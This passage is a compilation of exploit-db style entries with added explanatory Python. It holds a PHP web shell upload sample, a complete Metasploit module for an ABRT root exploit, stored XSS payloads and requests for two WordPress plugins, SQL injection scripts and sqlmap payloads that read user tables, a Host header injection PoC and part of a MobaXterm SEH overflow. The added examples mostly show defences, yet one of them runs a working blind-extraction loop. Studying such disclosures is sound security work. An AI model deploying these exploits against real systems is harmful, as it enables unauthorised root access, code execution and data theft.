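# Constructed sample: a real GIF header followed by a PHP one-liner.
SHELL_UPLOAD = b"GIF89a" + b"<?php system($_GET['c']); ?>"

if __name__ == "__main__":
    for name in ("shell.php.gif", "shell.gif", "note.php5"):
        print(f"{name:14s} weak={weak_accept(name, SHELL_UPLOAD)} strict={strict_accept(name, SHELL_UPLOAD)}")
```

Even the strict gate is only one layer: the directory the files land in should also be served without a script handler, which is what makes the rename step in the post harmless.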
8. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ABRT sosreport Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges on RHEL systems
        with a vulnerable version of Automatic Bug Reporting Tool (ABRT)
        configured as the crash handler.

        `sosreport` uses an insecure temporary directory, allowing local
        users to write to arbitrary files (CVE-2015-5287).

        This module uses a symlink attack on `/var/tmp/abrt/cc-*$pid/`
        to overwrite the `modprobe` path in `/proc/sys/kernel/modprobe`,
        resulting in root privileges.

        Waiting for `sosreport` could take a few minutes.

        This module has been tested successfully on:

        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rebel', # Discovery and sosreport-rhel7.py exploit
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2015-11-23',
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [[ 'Auto', {} ]],
      'References'     =>
        [
          ['BID', '78137'],
          ['CVE', '2015-5287'],
          ['EDB', '38832'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
        ]
    ))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir']
  end

  def timeout
    datastore['TIMEOUT']
  end

  def check
    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
      vprint_error 'System is not configured to use ABRT for crash reporting'
      return CheckCode::Safe
    end
    vprint_good 'System is configured to use ABRT for crash reporting'

    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
      vprint_error 'abrt-ccpp service not running'
      return CheckCode::Safe
    end
    vprint_good 'abrt-ccpp service is running'

    # Patched in 2.1.11-35.el7
    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]

    if abrt_version.blank?
      vprint_status 'Could not retrieve ABRT package version'
      return CheckCode::Safe
    end

    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "ABRT package version #{abrt_version} is vulnerable"

    unless command_exists? 'python'
      vprint_error 'python is not installed'
      return CheckCode::Safe
    end
    vprint_good 'python is installed'

    CheckCode::Appears
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    chmod path
    register_file_for_cleanup path
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
    exe_name = ".#{rand_text_alphanumeric 5..10}"
    exe_path = "#{base_dir}/#{exe_name}"
    upload_and_chmodx exe_path, exe_data

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload_and_chmodx payload_path, generate_payload_exe

    register_file_for_cleanup '/tmp/hax.sh'

    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end
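An added example, not part of the Metasploit module above: the same three conditions its `check` method evaluates (ABRT is the core_pattern handler, abrt-ccpp is active, the abrt package predates 2.1.11-35.el7), as standalone Python you can run over command output captured from a host. The version comparison is a simplified rpmvercmp (epoch ignored, version and release compared as one string), which is closer to how RPM orders releases than the Gem::Version comparison the module uses. The sample command output is constructed to resemble RHEL 7 formats.

```python
import re

FIXED_VERSION = "2.1.11-35.el7"   # "Patched in 2.1.11-35.el7" per the module


def uses_abrt_hook(core_pattern: str) -> bool:
    return "abrt-hook-ccpp" in core_pattern


def ccpp_service_active(systemctl_output: str) -> bool:
    return "inactive" not in systemctl_output


def abrt_version_from_yum(yum_output: str):
    """Same extraction as the module: first line starting with 'abrt',
    second whitespace-separated field."""
    for line in yum_output.splitlines():
        if line.startswith("abrt"):
            fields = line.split()
            return fields[1] if len(fields) > 1 else None
    return None


def rpm_vercmp(a: str, b: str) -> int:
    """Segment comparison in the spirit of rpmvercmp (simplified). Digit runs
    compare numerically, letter runs lexically, a digit run outranks a letter
    run, and a longer string wins a tie. Returns -1, 0 or 1."""
    def segments(v):
        return re.findall(r"\d+|[A-Za-z]+", v)
    sa, sb = segments(a), segments(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            xi, yi = int(x), int(y)
            if xi != yi:
                return 1 if xi > yi else -1
        elif x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) != len(sb):
        return 1 if len(sa) > len(sb) else -1
    return 0


def assess(core_pattern: str, systemctl_output: str, yum_output: str) -> str:
    """Mirror of the module's check order; the first failing condition wins."""
    if not uses_abrt_hook(core_pattern):
        return "safe: ABRT is not the core_pattern handler"
    if not ccpp_service_active(systemctl_output):
        return "safe: abrt-ccpp service inactive"
    version = abrt_version_from_yum(yum_output)
    if version is None:
        return "unknown: abrt package version not found"
    if rpm_vercmp(version, FIXED_VERSION) >= 0:
        return f"safe: abrt {version} is not older than {FIXED_VERSION}"
    return f"appears vulnerable: abrt {version} is older than {FIXED_VERSION}"


# Constructed sample command output, modelled on RHEL 7 formats.
SAMPLE_CORE_PATTERN = "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e %P %I"
SAMPLE_SYSTEMCTL = "   Active: active (exited) since Mon 2019-09-23 10:00:00 UTC; 2h ago"
SAMPLE_YUM_VULN = "Installed Packages\nabrt.x86_64    2.1.11-12.el7    @anaconda\n"
SAMPLE_YUM_FIXED = "Installed Packages\nabrt.x86_64    2.1.11-35.el7    @rhel-7-server-rpms\n"

if __name__ == "__main__":
    print(assess(SAMPLE_CORE_PATTERN, SAMPLE_SYSTEMCTL, SAMPLE_YUM_VULN))
    print(assess(SAMPLE_CORE_PATTERN, SAMPLE_SYSTEMCTL, SAMPLE_YUM_FIXED))
```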
9. # Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
# Exploit Author: Debashis Pal
# Vendor Homepage: http://www.yzmcms.com/
# Source: https://github.com/yzmcms/yzmcms
# Version: YzmCMS V5.3
# CVE : N/A
# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9

#About YzmCMS
==============
YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.

#Vulnerability
===============
Host Header Injection.

#PoC
=====
#YzmCMS V5.3 Access Path: TARGET/yzmcms/

curl http://TARGET/yzmcms/ -H "Host: www.google.com"

//sample output start
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>YzmCMS - 演示站</title>
<link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
<link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
<meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
<meta name="description" content="本站是yzmcms演示站点" />
<meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
<script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
</head>
<body>
<!--mini登陆条-->
<div id="head_login">
<div class="w1000">
<div id="mini">
<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a>
<a href="http://www.google.com/yzmcms/member/index/login.html" target="_blank">登录</a>
</div>
欢迎光临本站!
</div>
</div>
<!--网站容器-->
<div id="container">
<div id="header">
<div id="logo">
<a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
</div>
<div id="search">
<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
<div id="searchtxt" class="searchtxt">
<div class="searchmenu">
//sample output End

#Solution
==========
Don't trust the Host header. Only allow whitelisted hostnames.

#Disclosure Timeline
====================
Vulnerability Discover Date: 18-Sep-2019
Vulnerability Notification To vendor via Email: 18-Sep-2019, no response
Open issue in github : 22-Sep-2019, no response
Submit exploit-db : 25-Sep-2019

#Disclaimer
==========
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
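An added example, not YzmCMS code: the pattern the sample output shows (every absolute stylesheet, script and form URL built from the request's Host header) next to the allowlist check the Solution section asks for. The allowed hostnames are an assumption; the post does not name the real site's hostnames. Port suffixes, trailing dots and letter case are normalised before the comparison so that `Example.org:8443` and `example.org.` are accepted while `example.org.attacker.net` is not.

```python
from typing import Mapping, Set

# Assumed deployment hostnames; the real site's names are not in the post.
ALLOWED_HOSTS: Set[str] = {"example.org", "www.example.org"}


def normalise_host(host_header: str) -> str:
    """Strip the port (IPv6 literals keep their brackets), a trailing dot,
    and case, so the comparison is against a canonical hostname."""
    h = host_header.strip()
    if h.startswith("[") and "]" in h:          # [::1]:8080
        h = h[: h.index("]") + 1]
    else:
        h = h.split(":", 1)[0]
    return h.rstrip(".").lower()


def host_is_allowed(host_header: str, allowed=ALLOWED_HOSTS) -> bool:
    return normalise_host(host_header) in {a.lower() for a in allowed}


def base_url_from_host(headers: Mapping[str, str], scheme: str = "http") -> str:
    """The pattern behind the PoC: whatever Host says becomes the prefix of
    every absolute link, stylesheet, script and form action the page emits."""
    return f"{scheme}://{headers.get('Host', '')}/yzmcms/"


def base_url_checked(headers: Mapping[str, str], scheme: str = "http",
                     allowed=ALLOWED_HOSTS) -> str:
    """Only a configured name is echoed back; anything else is refused."""
    host = headers.get("Host", "")
    if not host_is_allowed(host, allowed):
        raise ValueError(f"untrusted Host header: {host!r}")
    return f"{scheme}://{normalise_host(host)}/yzmcms/"


def page_links(base_url: str) -> list:
    """Two of the absolute URLs the sample output shows being built from Host."""
    return [base_url + "common/static/js/js.js",
            base_url + "member/index/login.html"]


if __name__ == "__main__":
    spoofed = {"Host": "www.google.com"}
    print("unchecked:", page_links(base_url_from_host(spoofed)))
    try:
        base_url_checked(spoofed)
    except ValueError as e:
        print("checked  :", e)
```

Refusing the request is the right outcome here: a base URL that comes from configuration rather than from the request is also what stops the injected host from being cached or mailed out in password-reset links.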
10. # Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-06-11
# Exploit Author: Unk9vvN
# Vendor Homepage: https://duplicate-post.lopo.it/
# Software Link: https://wordpress.org/plugins/duplicate-post/
# Version: 3.2.3
# Tested on: Kali Linux
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the plugin management panel, and the vulnerability type is stored. The vulnerable parameters are as follows.
1. Go to the 'Settings' section
2. Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections
3. Click the "Save Changes" option
4. Your payload will run

# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
# Parameter & Payload:
duplicate_post_title_prefix="><script>alert(1)</script>
duplicate_post_title_suffix="><script>alert(1)</script>
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
duplicate_post_blacklist="><script>alert(1)</script>

#
# PoC
#

POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
Content-Type: application/x-www-form-urlencoded
Content-Length: 981
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1

# Discovered by: https://t.me/Unk9vvN
11. # Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
# Version: 3.2.7
# Tested on: Windows 10
# CVE: N/A

# Description
# This vulnerability is in the validation mode and is located in the all-in-one-seo-pack tab, and the vulnerability type is stored. The vulnerable parameters are as follows.
1. Go to the 'all-in-one-seo-pack' tab
2. Select 'general settings' section
3. Enter the payload in "Additional Front Page Headers", "Additional Posts Page Headers" section
4. Click the "Update Options" option
5. Your payload will run on visiting the page

# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
# Payload: "><script>alert(1)</script>

#
# PoC
#

POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
Content-Type: multipart/form-data; boundary=---------------------------24442753012045
Content-Length: 8625
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_front_meta_tags"

"><script>alert(1)</script>
-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_home_meta_tags"

"><script>alert(1)</script>
-----------------------------24442753012045
Content-Disposition: form-data; name="Submit"

Update Options »
-----------------------------24442753012045--

# Discovered by: https://unk9vvn.com
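An added example covering the four stored XSS posts above (SharePoint's single-quoted aria-label in post 3, WP Server Log Viewer's element text in post 5, and the double-quoted settings values of Duplicate-Post and All in One SEO Pack in posts 10 and 11). It is written for this page and is not code from any of those products. Each output context is rendered once without escaping and once with `html.escape` (with `quote=True` for attribute values), and a small HTMLParser-based sniffer reports what a browser would actually treat as script: a `<script>` element or an `on*` handler attribute. The payloads are the ones the posts use.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: the payloads from the posts, verbatim.
SHAREPOINT_FILENAME = "' onmouseover=alert(document.cookie) '.jpg"
WORDPRESS_OPTION = '"><script>alert(1)</script>'
LOGVIEWER_PATH = "<img src=# onerror=alert(document.cookie);>log.txt"


def upload_row_unsafe(filename: str) -> str:
    """Single-quoted attribute context (SharePoint's aria-label), unescaped:
    a ' in the name closes the attribute and the rest becomes new attributes."""
    return f"<a aria-label='{filename}' href='/files/{filename}'>{filename}</a>"


def upload_row_safe(filename: str) -> str:
    q = html.escape(filename, quote=True)   # & < > " and ' are all encoded
    return f"<a aria-label='{q}' href='/files/{q}'>{q}</a>"


def option_field_unsafe(name: str, value: str) -> str:
    """Double-quoted value attribute (the Duplicate-Post / All in One SEO
    settings fields): "> closes the input and a <script> element follows."""
    return f'<input type="text" name="{name}" value="{value}">'


def option_field_safe(name: str, value: str) -> str:
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'


def log_list_unsafe(paths) -> str:
    """Element text context (WP Server Log Viewer's stored paths)."""
    return "<ul>" + "".join(f"<li>{p}</li>" for p in paths) + "</ul>"


def log_list_safe(paths) -> str:
    return "<ul>" + "".join(f"<li>{html.escape(p)}</li>" for p in paths) + "</ul>"


class ScriptSniffer(HTMLParser):
    """Records script elements and on* handler attributes as the parser
    sees them; an escaped payload produces neither."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("<script> element")
        for attr, _value in attrs:
            if attr.lower().startswith("on"):
                self.findings.append(f"{attr} handler on <{tag}>")


def script_findings(markup: str) -> list:
    sniffer = ScriptSniffer()
    sniffer.feed(markup)
    sniffer.close()
    return sniffer.findings


if __name__ == "__main__":
    cases = [
        ("aria-label", upload_row_unsafe(SHAREPOINT_FILENAME), upload_row_safe(SHAREPOINT_FILENAME)),
        ("value attr", option_field_unsafe("duplicate_post_title_prefix", WORDPRESS_OPTION),
         option_field_safe("duplicate_post_title_prefix", WORDPRESS_OPTION)),
        ("text", log_list_unsafe([LOGVIEWER_PATH]), log_list_safe([LOGVIEWER_PATH])),
    ]
    for label, unsafe, safe in cases:
        print(f"{label:10s} unsafe={script_findings(unsafe)} safe={script_findings(safe)}")
```

The point the three contexts make together: escaping has to match where the value lands. `html.escape` without `quote=True` is enough for element text but leaves `'` and `"` alone, which is exactly what the aria-label and value-attribute payloads need.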
12. # Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A

# A malicious query can be sent in base64 encoding to unserialize() function.
# It can be deserialized without any sanitization then.
# After it, it gets passed directly to the SQL query.

#!/bin/python
import os
import base64
import requests
import sys


def generatePayload(query):
    # THIS FUNCTION IS INSECURE BY DESIGN: it hands the query to a local php
    # process through a shell command line
    b64_query = base64.b64encode(query.encode()).decode()
    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()


def ExecSQL(query):
    data = {"data": query, "data_type": "sql_query"}
    r = requests.post("http://" + ip + "/download.php", data=data)
    return r.content


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print('(+) usage: %s <target> ' % sys.argv[0])
        print('(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0])
        exit()
    ip = sys.argv[1] + "/" + sys.argv[2]
    # if you don't have php, set the payload to the next one to check this SQLi via "select @@version;":
    # czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
    data = r"select * from ino_user;"
    print(ExecSQL(generatePayload(data)))
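An added example, not part of the exploit or of inoERP: the `base64(serialize(...))` wrapper the PoC obtains by shelling out to `php -r`, reimplemented in Python so no local php is needed and no query text passes through a shell. The subset of PHP's serialize format covered here (strings with byte-length counts, ints, bools, null, arrays) is enough for the `s:N:"...";` string the endpoint unserializes, and the result for `select @@version;` is checked against the ready-made value the post quotes.

```python
import base64


def php_serialize(value) -> bytes:
    """Subset of PHP serialize(). Strings are length-prefixed in BYTES, not
    characters, which is why everything is handled as bytes here."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):               # before int: bool is an int subclass
        return b"b:%d;" % int(value)
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        value = value.encode("utf-8")
    if isinstance(value, bytes):
        return b's:%d:"%s";' % (len(value), value)
    if isinstance(value, (list, tuple)):
        items = b"".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return b"a:%d:{%s}" % (len(value), items)
    if isinstance(value, dict):
        items = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), items)
    raise TypeError(f"unsupported type: {type(value).__name__}")


def generate_payload(query: str) -> str:
    """Same output as the PoC's generatePayload(), without os.popen."""
    return base64.b64encode(php_serialize(query)).decode("ascii")


def build_request(query: str) -> dict:
    """The form fields the PoC's ExecSQL() posts to download.php."""
    return {"data": generate_payload(query), "data_type": "sql_query"}


if __name__ == "__main__":
    print(php_serialize("select @@version;"))
    print(generate_payload("select @@version;"))
    print(build_request("select * from ino_user;"))
```

The byte-length detail matters: a query containing non-ASCII characters serialized with a character count would fail PHP's unserialize, which is the kind of silent failure that makes an injection look "unexploitable" during testing.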
13. # Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-26
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
# Tested Version: 1.1
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Simple SQL injection after application authentication.

# POST Request
# Parameter: Consignment (POST)

# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now

# Type: UNION query
# Title: Generic UNION query (NULL) - 20 columns
Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now
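An added example, not Pic-A-Point code: the string-built query that sqlmap's findings above imply, beside a parameterised one, run against an in-memory SQLite table so the effect of the boolean-based payload can be observed and a blind extraction loop can be run end to end. The table, its rows and the three-column SELECT are constructed for the demo; the boolean payload is the post's, and the UNION payload is cut down to the demo's column count and to SQLite syntax (the post's FLOOR/RAND and SLEEP payloads are MySQL-specific and are not reproduced).

```python
import sqlite3

SELECT = "SELECT id, consignment, status FROM consignments WHERE consignment = "


def setup_db() -> sqlite3.Connection:
    """Constructed stand-in for the tracking table; schema and rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE consignments (id INTEGER PRIMARY KEY, consignment TEXT, status TEXT)")
    conn.executemany("INSERT INTO consignments (consignment, status) VALUES (?, ?)",
                     [("1001", "delivered"), ("1002", "in transit"), ("1234", "held at depot")])
    return conn


def trace_unsafe(conn, consignment: str):
    """The vulnerable pattern: the POST value is spliced into the SQL text."""
    return conn.execute(SELECT + f"'{consignment}'").fetchall()


def trace_safe(conn, consignment: str):
    """Parameterised: the value is bound and never parsed as SQL."""
    return conn.execute(SELECT + "?", (consignment,)).fetchall()


def boolean_oracle(conn, condition: str) -> bool:
    """Boolean-based blind: a row comes back only when `condition` is true,
    so each request leaks one bit about the database."""
    return len(trace_unsafe(conn, f"1234' AND ({condition})-- x")) > 0


def extract_string(conn, scalar_query: str, max_len: int = 32) -> str:
    """Recover the result of `scalar_query` one printable character at a time
    through the oracle; stops at the first position with no match."""
    out = ""
    for pos in range(1, max_len + 1):
        match = None
        for code in range(32, 127):
            if boolean_oracle(conn, f"unicode(substr(({scalar_query}),{pos},1))={code}"):
                match = chr(code)
                break
        if match is None:
            break
        out += match
    return out


# The post's boolean payload, and a false variant of it.
TRUE_PAYLOAD = "1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy"
FALSE_PAYLOAD = "1234' AND 9752=(SELECT (CASE WHEN (9752=9751) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy"
# UNION payload reduced to this demo's three columns, SQLite syntax.
UNION_PAYLOAD = "x' UNION ALL SELECT NULL,sqlite_version(),NULL-- cUud"

if __name__ == "__main__":
    conn = setup_db()
    print("true  :", trace_unsafe(conn, TRUE_PAYLOAD))
    print("false :", trace_unsafe(conn, FALSE_PAYLOAD))
    print("union :", trace_unsafe(conn, UNION_PAYLOAD))
    print("safe  :", trace_safe(conn, TRUE_PAYLOAD))
    print("blind :", extract_string(conn, "SELECT status FROM consignments WHERE id=1"))
```

In MySQL the false branch of the CASE raises "subquery returns more than 1 row", which is why sqlmap phrases the condition that way; in SQLite the scalar subquery just yields its first row, so the payload degrades to a plain true/false test but the oracle still works.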
  14. # Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
      # Author: Xavi Beltran
      # Date: 2019-08-31
      # Vendor: xavibel.com
      # Vendor Page: https://mobaxterm.mobatek.net/download.html
      # Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
      # Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/
      # Description:
      # SEH based Buffer Overflow in the Username field of a valid session
      # This exploit generates a malicious MobaXterm sessions file
      # When the user double clicks in the session, the shellcode is going to be executed
      # You need to adapt the exploit to your current OS Windows version

      #!/usr/bin/env python

      # This is not the IP address of the reverse shell
      # To be able to exploit the BOF you need to have a real machine with an open port that the target machine can reach
      ip_address = "192.168.1.88"
      port = "22"

      # We are going to recreate a MobaXterm sessions file export
      print ("[+] Creating the malicious MobaXterm file...")
      sessions_file = ""
      sessions_file += "[Bookmarks]\n"
      sessions_file += "SubRep=\n"
      sessions_file += "ImgNum=42\n"
      sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"

      # Here is the SEH Based Buffer Overflow part
      # [*] Exact match at offset 16672
      # We have to subtract 4 that corresponds to NSEH
      junk1 = "A" * 16668

      # Here we need to jump forward but EB is a bad char
      # We decrease ESP and use a conditional jump after
      # I have learned this trick in OSCE. Thank you Muts
      nseh = ""
      nseh += "\x4C"     # DEC ESP
      nseh += "\x4C"     # DEC ESP
      nseh += "\x77\x21" # JA SHORT 1035FE59

      # Using a XP-SP1 so modules are compiled without SafeSEH
      # !mona seh -cp asciiprint
      # 0x762C5042 POP-POP-RET crypt32.dll
      seh = "\x42\x50\x2C\x76"

      # Some padding that we are going to jump over it
      junk2 = "\x42" * 29

      # We recover the initial state of the stack
      alignment = ""
      alignment += "\x44" # INC ESP
      alignment += "\x44" # INC ESP

      # And we reach our shellcode
